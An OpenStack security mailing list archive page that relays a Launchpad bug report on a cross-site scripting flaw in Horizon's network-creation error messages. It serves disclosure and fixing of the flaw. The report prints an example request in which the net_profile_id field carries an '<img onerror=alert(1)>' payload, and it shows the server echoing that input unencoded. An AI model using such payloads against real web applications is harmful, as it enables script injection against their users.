[Openstack-security] [Bug 1417762] Re: XSS in network create error reporting
Jeremy Stanley
fungi at yuggoth.org
Tue Apr 14 21:26:28 UTC 2015
** Description changed:
- ---
-
- This issue is being treated as a potential security risk under embargo.
- Please do not make any public mention of embargoed (private) security
- vulnerabilities before their coordinated publication by the OpenStack
- Vulnerability Management Team in the form of an official OpenStack
- Security Advisory. This includes discussion of the bug or associated
- fixes in public forums such as mailing lists, code review systems and
- bug trackers. Please also avoid private disclosure to other individuals
- not already approved for access to this information, and provide this
- same reminder to those who are made aware of the issue prior to
- publication. All discussion should remain confined to this private bug
- report, and any proposed fixes should be added as to the bug as
- attachments.
-
- ---
-
The error reporting in Horizon for creating a new network is susceptible
to a Cross-Site Scripting vulnerability. Example request/response:
Request
POST /project/networks/create HTTP/1.1
...
csrfmiddlewaretoken=6MGUvp62x8c6GU7TfRXQLZERmJuN7nXT&net_profile_id=<img
src=zz
onerror=alert(1)>&net_name=foobar&admin_state=True&with_subnet=on&subnet_name=&cidr=&ip_version=4&gateway_ip=&enable_dhcp=on&ipv6_modes=none%2Fnone&allocation_pools=&dns_nameservers=&host_routes=
Response
HTTP/1.1 200 OK
Date: Tue, 03 Feb 2015 20:42:28 GMT
Server: Apache/2.4.10 (Debian)
Vary: Accept-Language,Cookie
X-Frame-Options: SAMEORIGIN
Content-Language: en
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/json
Content-Length: 209
{"has_errors": true, "errors": {"createnetworkinfoaction":
{"net_profile_id": ["Select a valid choice. <img src=zz
onerror=alert(1)> is not one of the available choices."]}},
"workflow_slug": "create_network"}
In the above example if the net_profile_id does not exist, the json
response contains the user input and Horizon echo's it out. Although it
would be difficult to exploit this vulnerability because an attacker
would need to manipulate the hidden HTML net_profile_id parameter or the
POST body, Horizon should still HTML encode the output.
--
You received this bug notification because you are a member of OpenStack
Security, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1417762
Title:
XSS in network create error reporting
Status in OpenStack Dashboard (Horizon):
New
Status in OpenStack Security Advisories:
Won't Fix
Bug description:
The error reporting in Horizon for creating a new network is
susceptible to a Cross-Site Scripting vulnerability. Example
request/response:
Request
POST /project/networks/create HTTP/1.1
...
csrfmiddlewaretoken=6MGUvp62x8c6GU7TfRXQLZERmJuN7nXT&net_profile_id=<img
src=zz
onerror=alert(1)>&net_name=foobar&admin_state=True&with_subnet=on&subnet_name=&cidr=&ip_version=4&gateway_ip=&enable_dhcp=on&ipv6_modes=none%2Fnone&allocation_pools=&dns_nameservers=&host_routes=
Response
HTTP/1.1 200 OK
Date: Tue, 03 Feb 2015 20:42:28 GMT
Server: Apache/2.4.10 (Debian)
Vary: Accept-Language,Cookie
X-Frame-Options: SAMEORIGIN
Content-Language: en
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/json
Content-Length: 209
{"has_errors": true, "errors": {"createnetworkinfoaction":
{"net_profile_id": ["Select a valid choice. <img src=zz
onerror=alert(1)> is not one of the available choices."]}},
"workflow_slug": "create_network"}
In the above example if the net_profile_id does not exist, the json
response contains the user input and Horizon echo's it out. Although
it would be difficult to exploit this vulnerability because an
attacker would need to manipulate the hidden HTML net_profile_id
parameter or the POST body, Horizon should still HTML encode the
output.
To manage notifications about this bug go to:
https://bugs.launchpad.net/horizon/+bug/1417762/+subscriptions
More information about the Openstack-security
mailing list